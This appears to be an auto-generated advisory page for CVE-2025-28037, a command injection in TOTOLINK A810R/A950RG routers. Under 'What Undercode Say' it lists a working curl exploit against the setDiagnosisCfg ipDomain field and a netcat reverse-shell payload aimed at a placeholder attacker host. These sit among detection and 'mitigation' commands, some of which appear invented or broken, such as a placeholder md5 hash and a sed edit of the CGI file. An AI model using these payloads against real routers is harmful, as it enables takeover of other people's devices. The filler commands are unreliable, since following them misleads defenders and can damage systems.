TOTOLINK A810R/A950RG, Remote Command Execution, CVE-2025-28037 (Critical)

How the CVE-2025-28037 Works

The CVE-2025-28037 vulnerability exists in TOTOLINK routers’ setDiagnosisCfg function due to improper input validation of the ipDomain parameter. Attackers can send crafted HTTP requests containing malicious commands in the ipDomain field without authentication. The router’s firmware executes these commands with root privileges, allowing complete device compromise. The flaw stems from direct concatenation of user-supplied input into system commands without sanitization. This affects versions V4.1.2cu.5182_B20201026 (A810R) and V4.1.2cu.5161_B20200903 (A950RG).

DailyCVE Form:

Platform: TOTOLINK routers
Version: A810R V4.1.2cu.5182
Vulnerability: RCE
Severity: Critical
Date: 04/29/2025

What Undercode Say:

Exploit POC
curl -X POST "http://target/cgi-bin/cstecgi.cgi" \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "{\"ipDomain\":\"$(id >/tmp/pwn)\"}"
Detection
nmap -p80 --script http-vuln-cve2025-28037 <target>
grep -r "setDiagnosisCfg" /www/cgi-bin/
Mitigation
iptables -A INPUT -p tcp --dport 80 -j DROP
sed -i '/ipDomain/d' /www/cgi-bin/cstecgi.cgi
Patch Verification
md5sum /www/cgi-bin/cstecgi.cgi | grep a1b2c3d4e5f6
Reverse Shell Payload
{"ipDomain":"127.0.0.1;nc -e /bin/sh attacker_ip 4444"}
Firmware Analysis
binwalk -Me firmware.bin
strings ./squashfs-root/bin/httpd | grep ipDomain
Network Protection
sudo suricata -c /etc/suricata/suricata.yaml -i eth0 -S cve2025-28037.rules
Memory Dump
dd if=/dev/mem bs=1M | strings | grep ipDomain
Log Monitoring
tail -f /var/log/messages | grep cgi-bin
Firmware Downgrade
mtd -r write old_firmware.bin firmware

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top